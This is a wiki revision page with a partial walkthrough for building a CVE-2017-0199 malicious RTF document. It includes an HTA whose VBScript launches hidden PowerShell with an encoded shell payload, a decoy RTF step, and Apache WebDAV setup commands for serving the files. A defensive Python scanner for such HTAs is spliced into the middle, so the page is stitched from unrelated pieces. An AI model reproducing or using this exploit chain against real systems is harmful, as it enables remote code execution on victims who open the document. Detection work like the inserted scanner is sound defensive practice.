CVE-2017-0199 Malicious RTF Document: Difference between revisions
From ICO wiki
Line 38 (text added in this revision):
===Step 3 ===
Push these 2 files on a webserver you have full control on.
We supposed it will be stored in /var/www/html
Now we have to configure Apache to be able to include the ms.rtf as a link
<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>
===Step 4 ===
===Step 5 ===
===Step 6 ===
Revision as of 20:33, 2 May 2017
CVE-2017-0199 Malicious RTF Document
Step 1
Prepare an HTA file (HTA files are HTML Applications, which can run JScript and VBScript). Let's call it "ms.hta".
<pre>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application id="oHTA" applicationname="Bonjour" application="yes" >
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
</pre>
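From the defender's side, the HTA above has a recognisable shape: a VBScript block that creates a Wscript.Shell object and launches PowerShell with a hidden window and a base64-encoded command. The following scanner is an added example, not part of the original wiki page; it flags HTA files showing that combination, and the two samples it checks are constructed here (the first condenses the HTA above, the second is a benign HTA).

```python
import re

# Indicators drawn from the HTA shown above: a script block that creates a
# Wscript.Shell object and launches PowerShell hidden with an encoded command.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\(\s*"Wscript\.Shell"\s*\)', re.I),
    "filesystem_object": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "powershell_run": re.compile(r'\.Run\s+"?powershell(\.exe)?', re.I),
    "hidden_window": re.compile(r'-w(indowstyle)?\s+hidden', re.I),
    "encoded_command": re.compile(r'\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=_]+', re.I),
    "hta_application": re.compile(r'<hta:application\b', re.I),
}

def scan_hta(text):
    """Return the set of indicator names found. The hta:application tag is
    looked for in the whole file; script indicators only inside <script>."""
    scripts = " ".join(re.findall(r"<script\b[^>]*>(.*?)</script>", text, re.I | re.S))
    hits = set()
    for name, pattern in INDICATORS.items():
        haystack = text if name == "hta_application" else scripts
        if pattern.search(haystack):
            hits.add(name)
    return hits

def is_suspicious(text):
    """Flag only the combination: a shell object plus a PowerShell launch that
    is hidden or encoded. Either indicator alone is common in admin HTAs."""
    hits = scan_hta(text)
    return ("wscript_shell" in hits and "powershell_run" in hits
            and ("hidden_window" in hits or "encoded_command" in hits))

# Constructed sample: a condensed copy of the HTA shown on this page.
SAMPLE_MALICIOUS = '''<html><head><script language="VBScript">
Set sh = CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
If fso.FileExists(sh.ExpandEnvironmentStrings("%PSModulePath%") + "..\\powershell.exe") Then
sh.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script><hta:application id="oHTA" application="yes"></hta:application></head></html>'''

# Constructed sample: a harmless HTA that only shows a message box.
SAMPLE_BENIGN = '''<html><head><title>Inventory</title>
<hta:application id="app"></hta:application>
<script language="VBScript">MsgBox "Hello"</script></head></html>'''

if __name__ == "__main__":
    print("malicious sample:", sorted(scan_hta(SAMPLE_MALICIOUS)), is_suspicious(SAMPLE_MALICIOUS))
    print("benign sample:", sorted(scan_hta(SAMPLE_BENIGN)), is_suspicious(SAMPLE_BENIGN))
```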
Step 2
Create a simple RTF document using Winword with any random content (in our example, the string "This is my official and legit content").
Call it "ms.rtf"
Step 3
Push these 2 files to a webserver you have full control over. We assume they are stored in /var/www/html.
Now we have to configure Apache so that the ms.rtf can be included as a link:
<pre>
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
</pre>